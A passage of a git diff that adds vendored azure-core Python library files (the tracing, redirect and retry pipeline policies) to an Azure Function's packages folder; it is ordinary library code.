+ response_callback = request.context.options.pop('raw_response_hook', None) + if response_callback: + request.context["raw_response_hook"] = response_callback + + + + def on_response(self, request, response): # pylint: disable=arguments-differ + # type: (PipelineRequest, PipelineResponse) -> None + """This is executed after the request comes back from the policy. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + response_callback = response.context.get("raw_response_hook") + if response_callback: + response_callback(response) + elif self._response_callback: + self._response_callback(response) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py new file mode 100644 index 0000000..7449d35 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py @@ -0,0 +1,132 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""Traces network calls using the implementation library from the settings.""" +import logging +import sys +from six.moves import urllib + +from azure.core.pipeline.policies import SansIOHTTPPolicy +from azure.core.settings import settings +from azure.core.tracing import SpanKind + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + # the HttpRequest and HttpResponse related type ignores stem from this issue: #5796 + from azure.core.pipeline.transport import HttpRequest, HttpResponse, AsyncHttpResponse # pylint: disable=ungrouped-imports + from azure.core.tracing._abstract_span import AbstractSpan # pylint: disable=ungrouped-imports + from azure.core.pipeline import PipelineRequest, PipelineResponse # pylint: disable=ungrouped-imports + from typing import Any, Optional, Dict, List, Union, Tuple + HttpResponseType = Union[HttpResponse, AsyncHttpResponse] + + +_LOGGER = logging.getLogger(__name__) + + +def _default_network_span_namer(http_request): + # type (HttpRequest) -> str + """Extract the path to be used as network span name. + + :param http_request: The HTTP request + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :returns: The string to use as network span name + :rtype: str + """ + path = urllib.parse.urlparse(http_request.url).path + if not path: + path = "/" + return path + + +class DistributedTracingPolicy(SansIOHTTPPolicy): + """The policy to create spans for Azure calls. + + :keyword network_span_namer: A callable to customize the span name + :type network_span_namer: callable[[~azure.core.pipeline.transport.HttpRequest], str] + :keyword tracing_attributes: Attributes to set on all created spans + :type tracing_attributes: dict[str, str] + """ + TRACING_CONTEXT = "TRACING_CONTEXT" + _REQUEST_ID = "x-ms-client-request-id" + _RESPONSE_ID = "x-ms-request-id" + + def __init__(self, **kwargs): + self._network_span_namer = kwargs.get('network_span_namer', _default_network_span_namer) + self._tracing_attributes = kwargs.get('tracing_attributes', {}) + + def on_request(self, request): + # type: (PipelineRequest) -> None + ctxt = request.context.options + try: + span_impl_type = settings.tracing_implementation() + if span_impl_type is None: + return + + namer = ctxt.pop('network_span_namer', self._network_span_namer) + span_name = namer(request.http_request) + + span = span_impl_type(name=span_name, kind=SpanKind.CLIENT) + for attr, value in self._tracing_attributes.items(): + span.add_attribute(attr, value) + span.start() + + headers = span.to_header() + request.http_request.headers.update(headers) + + request.context[self.TRACING_CONTEXT] = span + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to start network span: %s", err) + + def end_span(self, request, response=None, exc_info=None): + # type: (PipelineRequest, Optional[HttpResponseType], Optional[Tuple]) -> None + """Ends the span that is tracing the network and updates its status.""" + if self.TRACING_CONTEXT not in request.context: + return + + span = request.context[self.TRACING_CONTEXT] # type: AbstractSpan + http_request = request.http_request # type: HttpRequest + if span is not None: + span.set_http_attributes(http_request, response=response) + request_id = http_request.headers.get(self._REQUEST_ID) + if request_id is not None: + span.add_attribute(self._REQUEST_ID, request_id) + if response and self._RESPONSE_ID in response.headers: + span.add_attribute(self._RESPONSE_ID, response.headers[self._RESPONSE_ID]) + if exc_info: + span.__exit__(*exc_info) + else: + span.finish() + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + self.end_span(request, response=response.http_response) + + def on_exception(self, request): + # type: (PipelineRequest) -> None + self.end_span(request, exc_info=sys.exc_info()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py new file mode 100644 index 0000000..fbaff1a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py @@ -0,0 +1,166 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import logging +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +try: + from urlparse import urlparse # type: ignore +except ImportError: + from urllib.parse import urlparse + +from azure.core.exceptions import TooManyRedirectsError + +from ._base import HTTPPolicy, RequestHistory + + +_LOGGER = logging.getLogger(__name__) + +class RedirectPolicyBase(object): + + REDIRECT_STATUSES = frozenset([300, 301, 302, 303, 307, 308]) + + REDIRECT_HEADERS_BLACKLIST = frozenset(['Authorization']) + + def __init__(self, **kwargs): + self.allow = kwargs.get('permit_redirects', True) + self.max_redirects = kwargs.get('redirect_max', 30) + + remove_headers = set(kwargs.get('redirect_remove_headers', [])) + self._remove_headers_on_redirect = remove_headers.union(self.REDIRECT_HEADERS_BLACKLIST) + redirect_status = set(kwargs.get('redirect_on_status_codes', [])) + self._redirect_on_status_codes = redirect_status.union(self.REDIRECT_STATUSES) + super(RedirectPolicyBase, self).__init__() + + @classmethod + def no_redirects(cls): + """Disable redirects. + """ + return cls(permit_redirects=False) + + def configure_redirects(self, options): + """Configures the redirect settings. + + :param options: Keyword arguments from context. + :return: A dict containing redirect settings and a history of redirects. + :rtype: dict + """ + return { + 'allow': options.pop("permit_redirects", self.allow), + 'redirects': options.pop("redirect_max", self.max_redirects), + 'history': [] + } + + def get_redirect_location(self, response): + """Checks for redirect status code and gets redirect location. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Truthy redirect location string if we got a redirect status + code and valid location. ``None`` if redirect status and no + location. ``False`` if not a redirect status code. + """ + if response.http_response.status_code in [301, 302]: + if response.http_request.method in ['GET', 'HEAD', ]: + return response.http_response.headers.get('location') + return False + if response.http_response.status_code in self._redirect_on_status_codes: + return response.http_response.headers.get('location') + + return False + + def increment(self, settings, response, redirect_location): + """Increment the redirect attempts for this request. + + :param dict settings: The redirect settings + :param response: A pipeline response object. + :type response: ~azure.core.pipeline.PipelineResponse + :param str redirect_location: The redirected endpoint. + :return: Whether further redirect attempts are remaining. + False if exhausted; True if more redirect attempts available. + :rtype: bool + """ + # TODO: Revise some of the logic here. + settings['redirects'] -= 1 + settings['history'].append(RequestHistory(response.http_request, http_response=response.http_response)) + + redirected = urlparse(redirect_location) + if not redirected.netloc: + base_url = urlparse(response.http_request.url) + response.http_request.url = "{}://{}/{}".format( + base_url.scheme, + base_url.netloc, + redirect_location.lstrip('/')) + else: + response.http_request.url = redirect_location + if response.http_response.status_code == 303: + response.http_request.method = 'GET' + for non_redirect_header in self._remove_headers_on_redirect: + response.http_request.headers.pop(non_redirect_header, None) + return settings['redirects'] >= 0 + +class RedirectPolicy(RedirectPolicyBase, HTTPPolicy): + """A redirect policy. + + A redirect policy in the pipeline can be configured directly or per operation. + + :keyword bool permit_redirects: Whether the client allows redirects. Defaults to True. + :keyword int redirect_max: The maximum allowed redirects. Defaults to 30. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START redirect_policy] + :end-before: [END redirect_policy] + :language: python + :dedent: 4 + :caption: Configuring a redirect policy. + """ + + def send(self, request): + """Sends the PipelineRequest object to the next policy. + Uses redirect settings to send request to redirect endpoint if necessary. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum redirects exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises: ~azure.core.exceptions.TooManyRedirectsError if maximum redirects exceeded. + """ + retryable = True + redirect_settings = self.configure_redirects(request.context.options) + while retryable: + response = self.next.send(request) + redirect_location = self.get_redirect_location(response) + if redirect_location and redirect_settings['allow']: + retryable = self.increment(redirect_settings, response, redirect_location) + request.http_request = response.http_request + continue + return response + + raise TooManyRedirectsError(redirect_settings['history']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py new file mode 100644 index 0000000..74012f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py @@ -0,0 +1,72 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, Callable, Optional + +from azure.core.exceptions import TooManyRedirectsError +from . import AsyncHTTPPolicy +from ._redirect import RedirectPolicyBase + + +class AsyncRedirectPolicy(RedirectPolicyBase, AsyncHTTPPolicy): + """An async redirect policy. + + An async redirect policy in the pipeline can be configured directly or per operation. + + :keyword bool permit_redirects: Whether the client allows redirects. Defaults to True. + :keyword int redirect_max: The maximum allowed redirects. Defaults to 30. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START async_redirect_policy] + :end-before: [END async_redirect_policy] + :language: python + :dedent: 4 + :caption: Configuring an async redirect policy. + """ + + async def send(self, request): # pylint:disable=invalid-overridden-method + """Sends the PipelineRequest object to the next policy. + Uses redirect settings to send the request to redirect endpoint if necessary. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum redirects exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises: ~azure.core.exceptions.TooManyRedirectsError if maximum redirects exceeded. + """ + redirects_remaining = True + redirect_settings = self.configure_redirects(request.context.options) + while redirects_remaining: + response = await self.next.send(request) + redirect_location = self.get_redirect_location(response) + if redirect_location and redirect_settings['allow']: + redirects_remaining = self.increment(redirect_settings, response, redirect_location) + request.http_request = response.http_request + continue + return response + + raise TooManyRedirectsError(redirect_settings['history']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py new file mode 100644 index 0000000..c822932 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py @@ -0,0 +1,475 @@ +#pylint: disable=no-self-use +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +from io import SEEK_SET, UnsupportedOperation +import logging +import time +from enum import Enum +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +from azure.core.pipeline import PipelineResponse +from azure.core.exceptions import ( + AzureError, + ClientAuthenticationError, + ServiceResponseError, + ServiceRequestError, + ServiceRequestTimeoutError, + ServiceResponseTimeoutError, +) + +from ._base import HTTPPolicy, RequestHistory +from . import _utils +from ..._enum_meta import CaseInsensitiveEnumMeta + +_LOGGER = logging.getLogger(__name__) + +class RetryMode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + # pylint: disable=enum-must-be-uppercase + Exponential = 'exponential' + Fixed = 'fixed' + +class RetryPolicyBase(object): + # pylint: disable=too-many-instance-attributes + #: Maximum backoff time. + BACKOFF_MAX = 120 + _SAFE_CODES = set(range(506)) - set([408, 429, 500, 502, 503, 504]) + _RETRY_CODES = set(range(999)) - _SAFE_CODES + + def __init__(self, **kwargs): + self.total_retries = kwargs.pop('retry_total', 10) + self.connect_retries = kwargs.pop('retry_connect', 3) + self.read_retries = kwargs.pop('retry_read', 3) + self.status_retries = kwargs.pop('retry_status', 3) + self.backoff_factor = kwargs.pop('retry_backoff_factor', 0.8) + self.backoff_max = kwargs.pop('retry_backoff_max', self.BACKOFF_MAX) + self.retry_mode = kwargs.pop('retry_mode', RetryMode.Exponential) + self.timeout = kwargs.pop('timeout', 604800) + + retry_codes = self._RETRY_CODES + status_codes = kwargs.pop('retry_on_status_codes', []) + self._retry_on_status_codes = set(status_codes) | retry_codes + self._method_whitelist = frozenset(['HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE']) + self._respect_retry_after_header = True + super(RetryPolicyBase, self).__init__() + + @classmethod + def no_retries(cls): + """Disable retries. + """ + return cls(retry_total=0) + + def configure_retries(self, options): + """Configures the retry settings. + + :param options: keyword arguments from context. + :return: A dict containing settings and history for retries. + :rtype: dict + """ + return { + 'total': options.pop("retry_total", self.total_retries), + 'connect': options.pop("retry_connect", self.connect_retries), + 'read': options.pop("retry_read", self.read_retries), + 'status': options.pop("retry_status", self.status_retries), + 'backoff': options.pop("retry_backoff_factor", self.backoff_factor), + 'max_backoff': options.pop("retry_backoff_max", self.BACKOFF_MAX), + 'methods': options.pop("retry_on_methods", self._method_whitelist), + 'timeout': options.pop("timeout", self.timeout), + 'history': [] + } + + def get_backoff_time(self, settings): + """Returns the current backoff time. + + :param dict settings: The retry settings. + :return: The current backoff value. + :rtype: float + """ + # We want to consider only the last consecutive errors sequence (Ignore redirects). + consecutive_errors_len = len(settings['history']) + if consecutive_errors_len <= 1: + return 0 + + if self.retry_mode == RetryMode.Fixed: + backoff_value = settings['backoff'] + else: + backoff_value = settings['backoff'] * (2 ** (consecutive_errors_len - 1)) + return min(settings['max_backoff'], backoff_value) + + def parse_retry_after(self, retry_after): + """Helper to parse Retry-After and get value in seconds. + + :param str retry_after: Retry-After header + :rtype: float + """ + return _utils.parse_retry_after(retry_after) + + def get_retry_after(self, response): + """Get the value of Retry-After in seconds. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Value of Retry-After in seconds. + :rtype: float or None + """ + return _utils.get_retry_after(response) + + def _is_connection_error(self, err): + """Errors when we're fairly sure that the server did not receive the + request, so it should be safe to retry. + """ + return isinstance(err, ServiceRequestError) + + def _is_read_error(self, err): + """Errors that occur after the request has been started, so we should + assume that the server began processing it. + """ + return isinstance(err, ServiceResponseError) + + def _is_method_retryable(self, settings, request, response=None): + """Checks if a given HTTP method should be retried upon, depending if + it is included on the method allowlist. + + :param dict settings: The retry settings. + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :return: True if method should be retried upon. False if not in method allowlist. + :rtype: bool + """ + if response and request.method.upper() in ['POST', 'PATCH'] and \ + response.status_code in [500, 503, 504]: + return True + if request.method.upper() not in settings['methods']: + return False + + return True + + def is_retry(self, settings, response): + """Checks if method/status code is retryable. + + Based on allowlists and control variables such as the number of + total retries to allow, whether to respect the Retry-After header, + whether this header is present, and whether the returned status + code is on the list of status codes to be retried upon on the + presence of the aforementioned header. + + The behavior is: + - If status_code < 400: don't retry + - Else if Retry-After present: retry + - Else: retry based on the safe status code list ([408, 429, 500, 502, 503, 504]) + + + :param dict settings: The retry settings. + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: True if method/status code is retryable. False if not retryable. + :rtype: bool + """ + if response.http_response.status_code < 400: + return False + has_retry_after = bool(response.http_response.headers.get("Retry-After")) + if has_retry_after and self._respect_retry_after_header: + return True + if not self._is_method_retryable(settings, response.http_request, response=response.http_response): + return False + return settings['total'] and response.http_response.status_code in self._retry_on_status_codes + + def is_exhausted(self, settings): + """Checks if any retries left. + + :param dict settings: the retry settings + :return: False if have more retries. True if retries exhausted. + :rtype: bool + """ + retry_counts = (settings['total'], settings['connect'], settings['read'], settings['status']) + retry_counts = list(filter(None, retry_counts)) + if not retry_counts: + return False + + return min(retry_counts) < 0 + + def increment(self, settings, response=None, error=None): + """Increment the retry counters. + + :param settings: The retry settings. + :param response: A pipeline response object. + :type response: ~azure.core.pipeline.PipelineResponse + :param error: An error encountered during the request, or + None if the response was received successfully. + :return: Whether any retry attempt is available + True if more retry attempts available, False otherwise + :rtype: bool + """ + settings['total'] -= 1 + + if isinstance(response, PipelineResponse) and response.http_response.status_code == 202: + return False + + if error and self._is_connection_error(error): + # Connect retry? + settings['connect'] -= 1 + settings['history'].append(RequestHistory(response.http_request, error=error)) + + elif error and self._is_read_error(error): + # Read retry? + settings['read'] -= 1 + if hasattr(response, 'http_request'): + settings['history'].append(RequestHistory(response.http_request, error=error)) + + else: + # Incrementing because of a server error like a 500 in + # status_forcelist and a the given method is in the allowlist + if response: + settings['status'] -= 1 + if hasattr(response, 'http_request') and hasattr(response, 'http_response'): + settings['history'].append( + RequestHistory( + response.http_request, + http_response=response.http_response + ) + ) + + if self.is_exhausted(settings): + return False + + if response.http_request.body and hasattr(response.http_request.body, 'read'): + if 'body_position' not in settings: + return False + try: + # attempt to rewind the body to the initial position + response.http_request.body.seek(settings['body_position'], SEEK_SET) + except (UnsupportedOperation, ValueError, AttributeError): + # if body is not seekable, then retry would not work + return False + file_positions = settings.get('file_positions') + if response.http_request.files and file_positions: + try: + for value in response.http_request.files.values(): + file_name, body = value[0], value[1] + if file_name in file_positions: + position = file_positions[file_name] + body.seek(position, SEEK_SET) + except (UnsupportedOperation, ValueError, AttributeError): + # if body is not seekable, then retry would not work + return False + return True + + def update_context(self, context, retry_settings): + """Updates retry history in pipeline context. + + :param context: The pipeline context. + :type context: ~azure.core.pipeline.PipelineContext + :param retry_settings: The retry settings. + :type retry_settings: dict + """ + if retry_settings['history']: + context['history'] = retry_settings['history'] + + def _configure_timeout(self, request, absolute_timeout, is_response_error): + if absolute_timeout <= 0: + if is_response_error: + raise ServiceResponseTimeoutError('Response timeout') + raise ServiceRequestTimeoutError('Request timeout') + + # if connection_timeout is already set, ensure it doesn't exceed absolute_timeout + connection_timeout = request.context.options.get('connection_timeout') + if connection_timeout: + request.context.options["connection_timeout"] = min(connection_timeout, absolute_timeout) + + # otherwise, try to ensure the transport's configured connection_timeout doesn't exceed absolute_timeout + # ("connection_config" isn't defined on Async/HttpTransport but all implementations in this library have it) + elif hasattr(request.context.transport, "connection_config"): + default_timeout = getattr(request.context.transport.connection_config, "timeout", absolute_timeout) + try: + if absolute_timeout < default_timeout: + request.context.options["connection_timeout"] = absolute_timeout + except TypeError: + # transport.connection_config.timeout is something unexpected (not a number) + pass + + def _configure_positions(self, request, retry_settings): + body_position = None + file_positions = None + if request.http_request.body and hasattr(request.http_request.body, 'read'): + try: + body_position = request.http_request.body.tell() + except (AttributeError, UnsupportedOperation): + # if body position cannot be obtained, then retries will not work + pass + else: + if request.http_request.files: + file_positions = {} + try: + for value in request.http_request.files.values(): + name, body = value[0], value[1] + if name and body and hasattr(body, 'read'): + position = body.tell() + file_positions[name] = position + except (AttributeError, UnsupportedOperation): + file_positions = None + + retry_settings['body_position'] = body_position + retry_settings['file_positions'] = file_positions + +class RetryPolicy(RetryPolicyBase, HTTPPolicy): + """A retry policy. + + The retry policy in the pipeline can be configured directly, or tweaked on a per-call basis. + + :keyword int retry_total: Total number of retries to allow. Takes precedence over other counts. + Default value is 10. + + :keyword int retry_connect: How many connection-related errors to retry on. + These are errors raised before the request is sent to the remote server, + which we assume has not triggered the server to process the request. Default value is 3. + + :keyword int retry_read: How many times to retry on read errors. + These errors are raised after the request was sent to the server, so the + request may have side-effects. Default value is 3. + + :keyword int retry_status: How many times to retry on bad status codes. Default value is 3. + + :keyword float retry_backoff_factor: A backoff factor to apply between attempts after the second try + (most errors are resolved immediately by a second try without a delay). + In fixed mode, retry policy will alwasy sleep for {backoff factor}. + In 'exponential' mode, retry policy will sleep for: `{backoff factor} * (2 ** ({number of total retries} - 1))` + seconds. If the backoff_factor is 0.1, then the retry will sleep + for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is 0.8. + + :keyword int retry_backoff_max: The maximum back off time. Default value is 120 seconds (2 minutes). + + :keyword RetryMode retry_mode: Fixed or exponential delay between attemps, default is exponential. + + :keyword int timeout: Timeout setting for the operation in seconds, default is 604800s (7 days). + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START retry_policy] + :end-before: [END retry_policy] + :language: python + :dedent: 4 + :caption: Configuring a retry policy. + """ + def _sleep_for_retry(self, response, transport): + """Sleep based on the Retry-After response header value. + + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :param transport: The HTTP transport type. + """ + retry_after = self.get_retry_after(response) + if retry_after: + transport.sleep(retry_after) + return True + return False + + def _sleep_backoff(self, settings, transport): + """Sleep using exponential backoff. Immediately returns if backoff is 0. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + """ + backoff = self.get_backoff_time(settings) + if backoff <= 0: + return + transport.sleep(backoff) + + def sleep(self, settings, transport, response=None): + """Sleep between retry attempts. + + This method will respect a server's ``Retry-After`` response header + and sleep the duration of the time requested. If that is not present, it + will use an exponential backoff. By default, the backoff factor is 0 and + this method will return immediately. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + if response: + slept = self._sleep_for_retry(response, transport) + if slept: + return + self._sleep_backoff(settings, transport) + + def send(self, request): + """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises: ~azure.core.exceptions.AzureError if maximum retries exceeded. + :raises: ~azure.core.exceptions.ClientAuthenticationError if authentication + """ + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + self._configure_positions(request, retry_settings) + + absolute_timeout = retry_settings['timeout'] + is_response_error = True + + while retry_active: + try: + start_time = time.time() + self._configure_timeout(request, absolute_timeout, is_response_error) + response = self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + self.sleep(retry_settings, request.context.transport, response=response) + is_response_error = True + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except AzureError as err: + if absolute_timeout > 0 and self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + self.sleep(retry_settings, request.context.transport) + if isinstance(err, ServiceRequestError): + is_response_error = False + else: + is_response_error = True + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py new file mode 100644 index 0000000..31930ec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py @@ -0,0 +1,176 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import logging +import time +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import + +from azure.core.exceptions import ( + AzureError, + ClientAuthenticationError, + ServiceRequestError, +) +from ._base_async import AsyncHTTPPolicy +from ._retry import RetryPolicyBase + +_LOGGER = logging.getLogger(__name__) + + + +class AsyncRetryPolicy(RetryPolicyBase, AsyncHTTPPolicy): + """Async flavor of the retry policy. + + The async retry policy in the pipeline can be configured directly, or tweaked on a per-call basis. + + :keyword int retry_total: Total number of retries to allow. Takes precedence over other counts. + Default value is 10. + + :keyword int retry_connect: How many connection-related errors to retry on. + These are errors raised before the request is sent to the remote server, + which we assume has not triggered the server to process the request. Default value is 3. + + :keyword int retry_read: How many times to retry on read errors. + These errors are raised after the request was sent to the server, so the + request may have side-effects. Default value is 3. + + :keyword int retry_status: How many times to retry on 